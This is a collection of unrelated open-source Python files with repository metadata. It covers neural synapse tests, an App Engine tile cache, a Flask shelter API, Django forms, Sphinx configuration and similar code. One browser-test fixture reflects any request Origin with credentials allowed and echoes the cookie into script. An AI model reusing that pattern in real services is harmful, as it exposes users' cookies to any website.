Kminus = 0.0
Kminus_triplet = 0.0
weight = self.status("weight")
(Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0, Kplus, Kplus_triplet, Kminus, Kminus_triplet)
weight = self.depress(weight, Kminus, Kplus_triplet)
Kplus += 1.0
Kplus_triplet += 1.0
(Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0 + self.dendritic_delay, Kplus, Kplus_triplet,
Kminus, Kminus_triplet)
weight = self.facilitate(weight, Kplus, Kminus_triplet)
Kminus += 1.0
Kminus_triplet += 1.0
(Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0 - self.dendritic_delay, Kplus, Kplus_triplet,
Kminus, Kminus_triplet)
weight = self.depress(weight, Kminus, Kplus_triplet)
nest.Simulate(20.0)
self.assertAlmostEqualDetailed(weight, self.status("weight"), "weight should have decreased")
def test_weightChangeWhenPrePostPreSpikes(self):
"""Check that weight changes whenever a pre-post-pre spike triplet happen."""
self.generateSpikes(self.pre_neuron, [2.0, 6.0])
self.generateSpikes(self.post_neuron, [4.0])
self.generateSpikes(self.pre_neuron, [8.0]) # trigger computation
Kplus = self.status("Kplus")
Kplus_triplet = self.status("Kplus_triplet")
Kminus = 0.0
Kminus_triplet = 0.0
weight = self.status("weight")
(Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0, Kplus, Kplus_triplet, Kminus, Kminus_triplet)
weight = self.depress(weight, Kminus, Kplus_triplet)
Kplus += 1.0
Kplus_triplet += 1.0
(Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0 + self.dendritic_delay, Kplus, Kplus_triplet,
Kminus, Kminus_triplet)
weight = self.facilitate(weight, Kplus, Kminus_triplet)
Kminus += 1.0
Kminus_triplet += 1.0
(Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0 - self.dendritic_delay, Kplus, Kplus_triplet,
Kminus, Kminus_triplet)
weight = self.depress(weight, Kminus, Kplus_triplet)
Kplus += 1.0
Kplus_triplet += 1.0
(Kplus, Kplus_triplet, Kminus, Kminus_triplet) = self.decay(2.0, Kplus, Kplus_triplet, Kminus, Kminus_triplet)
weight = self.depress(weight, Kminus, Kplus_triplet)
nest.Simulate(20.0)
self.assertAlmostEqualDetailed(weight, self.status("weight"), "weight should have decreased")
def test_maxWeightStaturatesWeight(self):
"""Check that setting maximum weight property keep weight limited."""
limited_weight = self.status("weight") + 1e-10
limited_syn_spec = self.syn_spec.copy()
limited_syn_spec.update({"Wmax": limited_weight })
nest.Connect(self.pre_neuron, self.post_neuron, syn_spec=limited_syn_spec)
self.generateSpikes(self.pre_neuron, [2.0])
self.generateSpikes(self.pre_neuron, [3.0]) # trigger computation
nest.Simulate(20.0)
self.assertAlmostEqualDetailed(limited_weight, self.status("weight"), "weight should have been limited")
def suite():
return unittest.makeSuite(STDPTripletConnectionTestCase, "test")
def run():
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
if __name__ == "__main__":
run()
| magnastrazh/NEUCOGAR | nest/serotonin/research/C/nest-2.10.0/pynest/nest/tests/test_stdp_triplet_synapse.py | Python | gpl-2.0 | 10,707 |
"""This module contains a tile cache handler."""
__author__ = 'Aaron Steele'
# MOL imports
import cache
# Standard Python imports
import hashlib
import logging
import os
import urllib
import webapp2
# Google App Engine imports
from google.appengine.api import memcache
from google.appengine.api import urlfetch
from google.appengine.ext.webapp.util import run_wsgi_app
if 'SERVER_SOFTWARE' in os.environ:
PROD = not os.environ['SERVER_SOFTWARE'].startswith('Development')
else:
PROD = True
app_id = os.environ['CURRENT_VERSION_ID'].split('.')[0]
if PROD:
host_prefix = 'http'
if os.environ['SERVER_PORT'] == 443:
host_prefix = 'https'
app_host = host_prefix + '://' + os.environ['SERVER_NAME']
else:
app_host = 'http://localhost:8080'
class TileHandler(webapp2.RequestHandler):
"""Request handler for cache requests."""
def get(self):
tile_url = self.request.url.replace(app_host, 'http://mol.cartodb.com')
tile_key = 'tile-%s' % hashlib.sha224(tile_url).hexdigest() # tc means Tile Cache
tile_png = memcache.get(tile_key) # Check memcache
if not tile_png:
tile_png = cache.get(tile_key, value_type='blob') # Check datastore cache
if not tile_png:
result = urlfetch.fetch(tile_url, deadline=60) # Check CartoDB
if result.status_code == 200 or result.status_code == 304:
tile_png = result.content
cache.add(tile_key, tile_png, value_type='blob')
memcache.add(tile_key, tile_png)
else:
memcache.add(tile_key, tile_png)
if not tile_png:
self.error(404)
else:
self.response.headers["Content-Type"] = "image/png"
self.response.headers["Cache-Control"] = "max-age=2629743" # Cache 1 month
self.response.out.write(tile_png)
class GridHandler(webapp2.RequestHandler):
"""Request handler for cache requests."""
def get(self):
grid_url = self.request.url.replace(app_host, 'http://mol.cartodb.com')
grid_key = 'utfgrid-%s' % hashlib.sha224(grid_url).hexdigest() # gc means Grid Cache
grid_json = memcache.get(grid_key)
if not grid_json:
grid_json = cache.get(grid_key)
if not grid_json:
result = urlfetch.fetch(grid_url, deadline=60)
if result.status_code == 200 or result.status_code == 304:
grid_json = result.content
cache.add(grid_key, grid_json)
memcache.add(grid_key, grid_json)
else:
memcache.add(grid_key, grid_json)
if not grid_json:
self.error(404)
else:
self.response.headers["Content-Type"] = "application/json"
self.response.headers["Cache-Control"] = "max-age=2629743" # Cache 1 month
self.response.out.write(grid_json)
application = webapp2.WSGIApplication(
[('/tiles/[a-zA-Z0-9_-]+/[\d]+/[\d]+/[\d]+.png?.*', TileHandler),
('/tiles/[a-zA-Z0-9_-]+/[\d]+/[\d]+/[\d]+.grid.json?.*', GridHandler),],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
| MapofLife/MOL | app/tile_handler.py | Python | bsd-3-clause | 3,335 |
import numpy as np
from util import load_csv
import sys
y = load_csv(sys.argv[1])
t = load_csv(sys.argv[2])
assert len(y) == len(t)
mse = np.sum((y - t)**2) / (2 *(len(y)))
print mse
| williamd4112/simple-linear-regression | score.py | Python | mit | 188 |
def main(request, response):
cookie = request.cookies.first("COOKIE_NAME", None)
response_headers = [("Content-Type", "text/javascript"),
("Access-Control-Allow-Origin", request.headers.get("Origin")),
("Access-Control-Allow-Credentials", "true")]
cookie_value = '';
if cookie:
cookie_value = cookie.value;
return (200, response_headers, "postMessage('"+cookie_value+"');")
| peterjoel/servo | tests/wpt/web-platform-tests/workers/modules/resources/credentials.py | Python | mpl-2.0 | 452 |
# -*- coding: utf-8 -*-
"""
========
Logscale
========
For when linear is just not good enough.
You can set the `log_scale` property with a boolean, or specify a list of bools, or a list of parameter indexes,
or a list of parameter names, or a dictionary from parameter names to boolean values. Most things work, just give
it a crack.
"""
import numpy as np
from chainconsumer import ChainConsumer
from scipy.stats import lognorm
data = lognorm.rvs(0.95, loc=0, size=(100000, 2))
c = ChainConsumer()
c.add_chain(data, parameters=["$x_1$", "$x_2$"])
fig = c.plotter.plot(figsize="column", log_scales=True)
fig.set_size_inches(3 + fig.get_size_inches()) # Resize fig for doco. You don't need this.
###############################################################################
# It's not just for the main corner plot, you can do it anywhere.
fig = c.plotter.plot_walks(log_scales={"$x_1$": False}) # Dict example
fig.set_size_inches(3 + fig.get_size_inches()) # Resize fig for doco. You don't need this.
fig = c.plotter.plot_distributions(log_scales=[True, False]) # list[bool] example
fig.set_size_inches(3 + fig.get_size_inches()) # Resize fig for doco. You don't need this.
| Samreay/ChainConsumer | examples/customisations/plot_logscale.py | Python | mit | 1,195 |
if False:
for i in [1,2]:
pass
else:
pass
| RedHatQE/python-moncov | test/code/if_false_for_some.py | Python | gpl-3.0 | 48 |
def getText(path, mediaType):
(usecontent, content) = useBodyContent(path, mediaType)
if usecontent:
return content
else:
return ""
def getMediaType(path):
return runTika("-d", path).rstrip()
def useBodyContent(path, mediaType):
if mediaType == "text/plain":
return containsSearchableContent(path)
elif mediaType == "application/vnd.openxmlformats-officedocument.presentationml.presentation":
content = runTika("-t", path)
return (True, content)
else:
return (False, "")
def containsSearchableContent(path):
content = runTika("-t", path)
countOfLinesWithAlphabetCharacters = 0
lineCount = 0
lines = content.split('\n')
for line in lines:
l = line.rstrip()
if l:
lineCount += 1
if hasWords(l):
countOfLinesWithAlphabetCharacters += 1
percentage = float(countOfLinesWithAlphabetCharacters)/float(lineCount)
return ((percentage > 0.6), content)
def hasWords(what):
wordCount = 0
charactersInARow = 0
inWord = False
for c in what:
if c.isalpha():
if not inWord:
inWord = True
charactersInARow += 1
else:
if inWord and charactersInARow >= 3:
wordCount += 1
inWord = False
charactersInARow = 0
return wordCount >= 2
| materials-commons/materialscommons.org | backend/loader/tasks/extract.py | Python | mit | 1,402 |
#! /usr/bin/env python
#-*- coding: utf-8 -*-
# ***** BEGIN LICENSE BLOCK *****
#
#
# ***** END LICENSE BLOCK *****
__author__ = ""
__version__ = ""
__date__ = ""
__revision__ = ""
__copyright__ = ""
__license__ = ""
from bootstrap import db, app
from sqlalchemy.sql import func, select, desc
from flask import Blueprint, jsonify, request, json, Response, send_from_directory
from collections import defaultdict
from web.models import Shelter, Attribute, AttributePicture, Property, Value, Association, ShelterPicture, ShelterDocument, Category, Tsvector, Translation
import conf, os.path
from web.notifications import notifications
from web.decorators import docstring_formatter
apiv02_bp = Blueprint('development api v0.2', __name__, url_prefix='/api/v0.2')
def tree():
return defaultdict(tree)
def jsonify_utf8(text):
"""Jsonifies the input object and sets the encoding to UTF-8.
Useful when serving static files as JSON so UTF-8 characters are shown properly"""
return Response(json.dumps(text, indent=3, sort_keys=False), mimetype='application/json;charset=utf-8')
def populate_dictree(query, catquery, dictree, prettytext=False):
"""
Populates a multidict tree object with the shelter properties
"""
booleantext = ("no","yes")
for s in query:
if not dictree[s.shelter_id]:
for c in catquery:
if c.name == "Identification":
dictree[s.shelter_id][c.name]["Cover"]
dictree[s.shelter_id][c.name]["Attributes"]
dictree[s.shelter_id][c.name]["Pictures"]
dictree[s.shelter_id][c.name]["Documents"]
if prettytext:
if s.type == "yes / no":
dictree[s.shelter_id][s.supercategory_name]["Attributes"][s.name] = booleantext[int(s.value)]
else:
dictree[s.shelter_id][s.supercategory_name]["Attributes"][s.name] = s.value
else:
if s.type == "yes / no":
dictree[s.shelter_id][s.supercategory_name]["Attributes"][s.uniqueid] = booleantext[int(s.value)]
else:
dictree[s.shelter_id][s.supercategory_name]["Attributes"][s.uniqueid] = s.value
return dictree
def populate_documents(query, dictree, docpath):
"""
populates documents in an existing dictree for the shelters it contains
"""
for d in query:
if d.shelter_id in dictree:
if not dictree[d.shelter_id][d.name]["Documents"]:
dictree[d.shelter_id][d.name]["Documents"] = ["{}/{}/{}".format(docpath, d.shelter_id, d.filename)]
else:
dictree[d.shelter_id][d.name]["Documents"].append("{}/{}/{}".format(docpath, d.shelter_id, d.filename))
return dictree
def populate_pictures(query, dictree, picpath):
"""
populates pictures in an existing dictree for the shelters it contains
"""
for p in query:
if p.shelter_id in dictree:
if p.is_main_picture == True:
if not dictree[p.shelter_id]["Identification"]["Cover"]:
dictree[p.shelter_id]["Identification"]["Cover"] = ["{}/{}/{}".format(picpath, p.shelter_id, p.filename)]
else:
dictree[p.shelter_id]["Identification"]["Cover"].append("{}/{}/{}".format(picpath, p.shelter_id, p.filename))
elif not dictree[p.shelter_id][p.name]["Pictures"]:
dictree[p.shelter_id][p.name]["Pictures"] = ["{}/{}/{}".format(picpath, p.shelter_id, p.filename)]
return dictree
@apiv02_bp.route('/', methods=['GET'])
def apimessage():
message = tree()
message["API version"] = 0.2
message["Message"] = "This is the development API"
return jsonify(message)
@apiv02_bp.route('/email', methods=['GET'])
def mail():
query = Shelter.query.first()
notifications.new_shelter_creation(query)
@apiv02_bp.route('/documentation', methods=['GET'])
def documentation():
"""
Serves this documentation page
"""
return send_from_directory('static/documentation','apidoc.html')
@apiv02_bp.route('/glossary', methods=['GET'])
def glossary():
"""
Retrieve the glossary in JSON format, readable by Glossarizer
(https://github.com/PebbleRoad/glossarizer)
"""
with app.open_resource('static/data/glossary.json') as f:
text = json.load(f, encoding='utf-8')
return jsonify_utf8(text)
@apiv02_bp.route('/worldmap', methods=['GET'])
def worldmap():
#"""
#Retrieve a world map in GeoJSON format,
#with polygons and a centroid point representing each country
#"""
with app.open_resource('static/data/countries.geojson') as f:
data = json.load(f, encoding='utf-8')
return jsonify_utf8(data)
@docstring_formatter(conf.PLATFORM_URL)
@apiv02_bp.route('/attributes/pictures', methods=['GET'])
@apiv02_bp.route('/attributes/pictures/<language_code>', methods=['GET'])
def attribute_pictures(language_code='en'):
"""
Retrieve attribute pictures in a given language. If no language code prameter supplied, the default language is English.
:param language_code: language code, in lower case two letter format. Example: 'fr' for French
:type language_code: string
**Example requests**:
.. sourcecode:: html
# get attribute pictures in default language (English)
GET {0}/api/v0.2/attributes/pictures
# get attribute pictures in French
GET {0}/api/v0.2/attributes/pictures/fr
"""
result = tree()
picpath = conf.ATTRIBUTES_PICTURES_SITE_PATH
query = db.session.query(Attribute.name, Category.name.label("category_name"),
func.array_agg(picpath + '/' + language_code + '/' + AttributePicture.file_name).label("file_names"))\
.join(AttributePicture, Attribute.id==AttributePicture.attribute_id)\
.join(Category, Category.id==Attribute.category_id)\
.filter(AttributePicture.language_code==language_code)\
.group_by(Category.name, Attribute.name)
for a in query:
result[a.category_name][a.name] = a.file_names
return jsonify(result)
@docstring_formatter(conf.PLATFORM_URL)
@apiv02_bp.route('/attributes/pictures/has/<uniqueid>', methods=['GET'])
def has_picture(uniqueid):
"""
Retrieve attribute picture for specific attribute
:param uniqueid: uniqueid of the attribute
:type uniqueid: string
**Example requests**:
.. sourcecode:: html
# get pictures for Foundation Type (uniqueid: foundationtype)
GET {0}/api/v0.2/attributes/pictures/has/foundationtype
"""
result = tree()
picpath = conf.ATTRIBUTES_PICTURES_SITE_PATH
query = db.session.query(AttributePicture.file_name).join(Attribute).filter(Attribute.uniqueid==uniqueid).first()
if query:
result = {uniqueid:[picpath + '/' + query[0]]}
else:
result = {uniqueid:[False]}
print(query)
return(jsonify(result))
@docstring_formatter(conf.PLATFORM_URL)
@apiv02_bp.route('/attributes/<attribute_name>', methods=['GET'])
def getattributes(attribute_name, safetext=False):
"""
Retrieve available values for a given `attribute_name`
separated by semicolons
:param attribute_name: uniqueid of an attribute name
:type language_code: string
**Example requests**:
.. sourcecode:: html
# get all values for attribute "Foor finish material" (uniqueid: floorfinishmaterial)
GET {0}/api/v0.2/attributes/floorfinishmaterial
"""
result= tree()
attributes = Attribute.query.filter(Attribute.uniqueid==attribute_name).\
first().associated_values
result[attribute_name] = ";".join([attribute.name for attribute in attributes])
return jsonify(result)
@apiv02_bp.route('/translation', methods=['GET'])
def available_translations():
#"""
#Retrieve language codes of available translations
#"""
result = tree()
subquery = db.session.query(Translation.language_code).group_by(Translation.language_code).subquery()
query = db.session.query(func.array_agg(subquery.c.language_code)).first()
#for language in available_languages
result["languages"]= query[0]
return jsonify_utf8(result)
@apiv02_bp.route('/translation/<language_code>', methods=['GET'])
def translations(language_code=None):
#"""
#Retrieve translations for a given `language_code`
#
#:param language_code: language code
#:type language_code: string
#"""
result = tree()
query = Translation.query.filter(Translation.language_code==language_code)
phrases = query
for phrase in phrases:
result[phrase.original]=phrase.translated
return jsonify_utf8(result)
@docstring_formatter(conf.PLATFORM_URL)
@apiv02_bp.route('/shelters', methods=['GET'])
@apiv02_bp.route('/shelters/<int:shelter_id>', methods=['GET'])
def allshelters(shelter_id=None):
"""
Retrieves shelters with all of their attributes and pictures.
:param shelter_id: a unique shelter ID generated by the server
:type shelter_id: int
:query format:
if set to ``prettytext``,
attribute names are retrieved as nicely formatted text
(Capital letters, special characters and spaces allowed)
:query attribute:
attribute name
:query value:
attribute value
:query q:
Full text search. Works in English language only.
**Example requests**:
.. sourcecode:: html
# get all shelters
GET {0}/api/v0.2/shelters
# get shelter whith shelter ID 11
GET {0}/api/v0.2/shelters/11
# get all shelters which have attribute 'storeys'
GET {0}/api/v0.2/shelters?attribute=storeys
# get all shelters which have 2 storeys
GET {0}/api/v0.2/shelters?attribute=storeys&value=2
"""
result = tree()
picpath = os.path.relpath(conf.SHELTERS_PICTURES_SITE_PATH)
docpath = os.path.relpath(conf.SHELTERS_DOCUMENTS_SITE_PATH)
pretty = False
Supercategory = db.aliased(Category)
querybase = db.session.query(Property.shelter_id, Category.name.label("category_name"), Supercategory.name.label("supercategory_name"), Attribute.name, Attribute.uniqueid, Attribute.type, func.string_agg(Value.name,';').label("value"))\
.join(Shelter, Shelter.id==Property.shelter_id)\
.join(Category, Category.id==Property.category_id)\
.join(Attribute, Attribute.id==Property.attribute_id)\
.join(Supercategory, Supercategory.id==Category.parent_id)\
.join(Association, Property.id==Association.property_id)\
.join(Value, Association.value_id==Value.id)\
.group_by(Property.shelter_id, Supercategory.name, Category.name, Attribute.name, Attribute.uniqueid, Attribute.type)
picquerybase = db.session.query(ShelterPicture.shelter_id, ShelterPicture.file_name.label("filename"), ShelterPicture.is_main_picture, Category.name)\
.join(Category, Category.id == ShelterPicture.category_id)
catquery = db.session.query(Category.name).filter(Category.section_id != None)
docquerybase = db.session.query(ShelterDocument.shelter_id, ShelterDocument.file_name.label("filename"), ShelterDocument.category_id, Category.name)\
.join(Category, Category.id == ShelterDocument.category_id)
##queries if no request arguments
shelter_properties = querybase
shelter_pictures = picquerybase
shelter_documents = docquerybase
if shelter_id:
shelter_properties = querybase.filter(Property.shelter_id==shelter_id)
shelter_pictures = picquerybase.filter(ShelterPicture.shelter_id==shelter_id)
shelter_documents = docquerybase.filter(ShelterDocument.shelter_id==shelter_id)
else:
#only query published shelters if no shelter_id supplied
shelter_properties = shelter_properties.filter(Shelter.is_published == True)
if request.args.getlist('attribute'):
attribute = request.args.getlist('attribute')
subquery = db.session.query(Property.shelter_id)\
.join(Attribute, Attribute.id==Property.attribute_id)\
.filter(Attribute.uniqueid.in_(attribute))\
.group_by(Property.shelter_id)
shelter_properties = shelter_properties.filter(subquery.subquery().c.shelter_id==Property.shelter_id)
shelter_pictures = shelter_pictures.filter(subquery.subquery().c.shelter_id==ShelterPicture.shelter_id)
shelter_documents = shelter_documents.filter(subquery.subquery().c.shelter_id==ShelterDocument.shelter_id)
if request.args.getlist('value'):
value = request.args.getlist('value')
if not request.args.getlist('attribute'):
subquery = db.session.query(Property.shelter_id)\
.join(Attribute, Attribute.id==Property.attribute_id)\
.filter(Property.values.any(Value.name.in_(value)))\
.group_by(Property.shelter_id)
else:
subquery = subquery.filter(Property.values.any(Value.name.in_(value)))
shelter_properties = shelter_properties.filter(subquery.subquery().c.shelter_id==Property.shelter_id)
shelter_pictures = shelter_pictures.filter(subquery.subquery().c.shelter_id==ShelterPicture.shelter_id)
shelter_documents = shelter_documents.filter(subquery.subquery().c.shelter_id==ShelterDocument.shelter_id)
if request.args.get('q'):
attribute = request.args.get('q')
shelter_properties = shelter_properties.join(Tsvector, Property.shelter_id==Tsvector.shelter_id).filter(Tsvector.lexeme.match(attribute))
shelter_pictures = shelter_pictures.join(Tsvector, ShelterPicture.shelter_id==Tsvector.shelter_id).filter(Tsvector.lexeme.match(attribute))
shelter_documents = shelter_documents.join(Tsvector, ShelterDocument.shelter_id==Tsvector.shelter_id).filter(Tsvector.lexeme.match(attribute))
if request.args.get('format') == 'prettytext':
pretty = True
result = populate_dictree(shelter_properties, catquery, result, prettytext=pretty)
populate_pictures(shelter_pictures, result, picpath)
populate_documents(shelter_documents, result, docpath)
return jsonify(result)
@docstring_formatter(conf.PLATFORM_URL)
@apiv02_bp.route('/shelters/latest', methods=['GET'])
@apiv02_bp.route('/shelters/latest/<int:count>', methods=['GET'])
def latestshelters(count=1):
"""
Retrieves latest shelters (updates to existing shelters also count).
Only retrieves shelters that have pictures. If no count parameter is supplied, the API
retrieves the latest shelter.
:param count: number of latest shelters to return
:type count: int
**Example requests**:
.. sourcecode:: html
# get latest shelter
GET {0}/api/v0.2/shelters/latest
# get the 3 latest shelters
GET {0}/api/v0.2/shelters/latest/3
"""
result = tree()
pretty = False
picpath = os.path.relpath(conf.SHELTERS_PICTURES_SITE_PATH)
Supercategory = db.aliased(Category)
subsubquery = db.session.query(ShelterPicture.shelter_id).filter(ShelterPicture.is_main_picture == True).subquery()
subquery= db.session.query(Shelter)\
.filter(Shelter.is_published == True)\
.filter(Shelter.id.in_(subsubquery))\
.order_by(desc(Shelter.updated_at))\
.limit(count).subquery()
querybase = db.session.query(subquery.c.id.label("shelter_id"), Category.name.label("category_name"), Supercategory.name.label("supercategory_name"), Attribute.name, Attribute.uniqueid, Attribute.type, func.string_agg(Value.name,';').label("value"))\
.join(Property, subquery.c.id==Property.shelter_id)\
.join(Category, Category.id==Property.category_id)\
.join(Attribute, Attribute.id==Property.attribute_id)\
.join(Supercategory, Supercategory.id==Category.parent_id)\
.join(Association, Property.id==Association.property_id)\
.join(Value, Association.value_id==Value.id)\
.order_by(desc(subquery.c.updated_at))\
.group_by(subquery.c.updated_at,subquery.c.id, Supercategory.name, Category.name, Attribute.name, Attribute.uniqueid,Attribute.type)
picquerybase = db.session.query(ShelterPicture.shelter_id, ShelterPicture.file_name.label("filename"), ShelterPicture.is_main_picture, Category.name)\
.join(Category, Category.id == ShelterPicture.category_id)
catquery = db.session.query(Category.name).filter(Category.section_id != None)
##queries if no request arguments
shelter_properties = querybase
shelter_pictures = picquerybase
if request.args.get('format') == 'prettytext':
pretty = True
result = populate_dictree(shelter_properties, catquery, result, prettytext=pretty)
populate_pictures(shelter_pictures, result, picpath)
return jsonify(result)
| rodekruis/shelter-database | src/web/views/api/shelter_api_v02.py | Python | mit | 16,979 |
from django import forms
from .models import Policy, Operation
SIGNALS = (
('None', 'None'),
('lavfi.signalstats.BRNG', 'BRNG'),
('lavfi.cropdetect.y2', 'Crop Bottom'),
('lavfi.cropdetect.y1', 'Crop Top'),
('lavfi.cropdetect.x1', 'Crop Left'),
('lavfi.cropdetect.x2', 'Crop Right'),
('lavfi.cropdetect.h', 'Crop Height'),
('lavfi.cropdetect.w', 'Crop Width'),
('lavfi.cropdetect.x', 'Crop X'),
('lavfi.cropdetect.y', 'Crop Y'),
('lavfi.signalstats.HUEAVG', 'HUE AVG'),
('lavfi.signalstats.HUEMED', 'HUE MED'),
('lavfi.psnr.mse_avg', 'MSEf Avg'),
('lavfi.psnr.mse.u', 'MSEf U'),
('lavfi.psnr.mse.v', 'MSEf V'),
('lavfi.psnr.mse.y', 'MSEf Y'),
('lavfi.psnr.psnr_avg', 'PSNRf Avg'),
('lavfi.psnr.psnr.u', 'PSNRf U'),
('lavfi.psnr.psnr.v', 'PSNRf V'),
('lavfi.psnr.psnr.y', 'PSNRf Y'),
('lavfi.r128.I', 'R128.I'),
('lavfi.r128.LRA', 'R128.LRA'),
('lavfi.r128.LRA.high', 'R28.LRA.high'),
('lavfi.r128.LRA.low', 'R128.LRA.low'),
('lavfi.r128.M', 'R128.M'),
('lavfi.r128.S', 'R128.S'),
('lavfi.signalstats.SATAVG', 'SAT AVG'),
('lavfi.signalstats.SATHIGH', 'SAT HIGH'),
('lavfi.signalstats.SATLOW', 'SAT LOW'),
('lavfi.signalstats.SATMAX', 'SAT MAX'),
('lavfi.signalstats.SATMIN', 'SAT MIN'),
('lavfi.signalstats.TOUT', 'TOUT'),
('lavfi.signalstats.UAVG', 'U AVG'),
('lavfi.signalstats.UDIF', 'U DIF'),
('lavfi.signalstats.UHIGH', 'U HIGH'),
('lavfi.signalstats.ULOW', 'U LOW'),
('lavfi.signalstats.UMAX', 'U MAX'),
('lavfi.signalstats.UMIN', 'U MIN'),
('lavfi.signalstats.VAVG', 'V AVG'),
('lavfi.signalstats.VDIF', 'V DIF'),
('lavfi.signalstats.VHIGH', 'V HIGH'),
('lavfi.signalstats.VLOW', 'V LOW'),
('lavfi.signalstats.VMAX', 'V MAX'),
('lavfi.signalstats.VMIN', 'V MIN'),
('lavfi.signalstats.VREP', 'VREP'),
('lavfi.signalstats.YAVG', 'Y AVG'),
('lavfi.signalstats.YDIF', 'Y DIF'),
('lavfi.signalstats.YHIGH', 'Y HIGH'),
('lavfi.signalstats.YLOW', 'Y LOW'),
('lavfi.signalstats.YMAX', 'Y MAX'),
('lavfi.signalstats.YMIN', 'Y MIN')
)
OPERATIONS = (
('average', 'average'),
('exceeds', 'count of frames with value above'),
('equals', 'count of frames with value equal to'),
('belows', 'count of frames with value below'),
('average_difference', 'average_difference'),
)
DASHBOARD = (('True', True), ('False', False))
class PolicyNameForm(forms.Form):
policy_name = forms.CharField(label='Policy name', max_length=200)
class PolicyFileForm(forms.Form):
policyfile = forms.FileField(
widget=forms.ClearableFileInput(attrs={'multiple': True}),
label='Select a policy file',
help_text=''
)
class PolicyForm(forms.Form):
policy_name = forms.CharField(
label='Policy name'
)
description = forms.CharField(
label='Policy Description',
required=False
)
display_order = forms.IntegerField(
label='Display Location No.', initial=0
)
dashboard = forms.ChoiceField(
widget=forms.CheckboxInput,
required=False, label='Show in Dashboard'
)
class OperationForm(forms.Form):
signal_fields = forms.ChoiceField(choices=SIGNALS, required=True)
operation_fields = forms.ChoiceField(
choices=OPERATIONS,
required=True,
widget=forms.Select(attrs={"onChange": 'operationSelect(this)'})
)
second_signal_fields = forms.ChoiceField(
choices=SIGNALS, required=False
)
cutoff_number = forms.FloatField(
label='Please enter the cut off number', initial=0
)
display_order = forms.IntegerField(
label='Please enter the display order', initial=0
)
description = forms.CharField(
label='Policy Description',
required=False
)
dashboard = forms.ChoiceField(widget=forms.CheckboxInput, required=False)
percentage = forms.FloatField(
label='Dashboard Group error percentage', initial=0
)
file_percentage = forms.FloatField(
label='Dashboard File error percentage', initial=0
)
| yayoiukai/signalserver | policies/forms.py | Python | mit | 4,131 |
import plugin
import hashlib
import electrum
def pick(chars, word, i):
filtered = [w for w in word if w in chars]
if len(filtered) == 0:
print '>', repr(chars), repr(word), i
return ' '
else:
return filtered[i % len(filtered)]
def pick_vowel(word, i):
return pick('aeiouy', word, i)
def pick_consonant(word, i):
return pick('bcdfghjklmnpqrstvwxyz', word, i)
class Plugin(plugin.Plugin):
def __init__(self):
plugin.Plugin.__init__(self, 'Name', 'Generates a pronouncable name.')
self.fields = []
def doit(self, seed):
# sha512 with electrum gives us 48 words to work with
words = electrum.mnemonic_encode(hashlib.sha512(seed).hexdigest()) # Words used:
len_first = 3 + int(hashlib.md5(words[0]).hexdigest()[:10], 16) % 5 # 8
len_middle= 1 + int(hashlib.md5(words[1]).hexdigest()[:10], 16) % 8 # 9
len_last = 2 + int(hashlib.md5(words[2]).hexdigest()[:10], 16) % 10 # 12
words = words[3:] # + 3
# =32
ret = ''
for i, w in enumerate(words):
if i % 2:
ret += pick_vowel(w, i)
else:
ret += pick_consonant(w, i)
name = ret.split()
if len(name) == 1 and len(name[0]) == len_first:
ret += ' '
elif len(name) == 2 and len(name[1]) == len_middle:
ret += ' '
if len(name) == 3 and len(name[2]) == len_last:
break
name = ' '.join(w.capitalize() for w in ret.split())
return plugin.Return('Your name is: %s' % name)
if __name__ == '__main__':
import sys
seed = 'seed'
if len(sys.argv) == 2:
seed = sys.argv[1]
p = Plugin()
for i in range(25):
print '>', seed, i,':',
p.doit(hashlib.sha512(seed + str(i)).hexdigest())
| arttukasvio/deterministic | name.py | Python | unlicense | 1,821 |
# -*- coding: utf-8 -*-
#
# python-loaders documentation build configuration file, created by
# sphinx-quickstart on Mon Sep 10 09:57:03 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'python-loaders'
copyright = u'2012, Oskari Hiltunen'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.2.3'
# The full version, including alpha/beta/rc tags.
release = '0.2.3'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
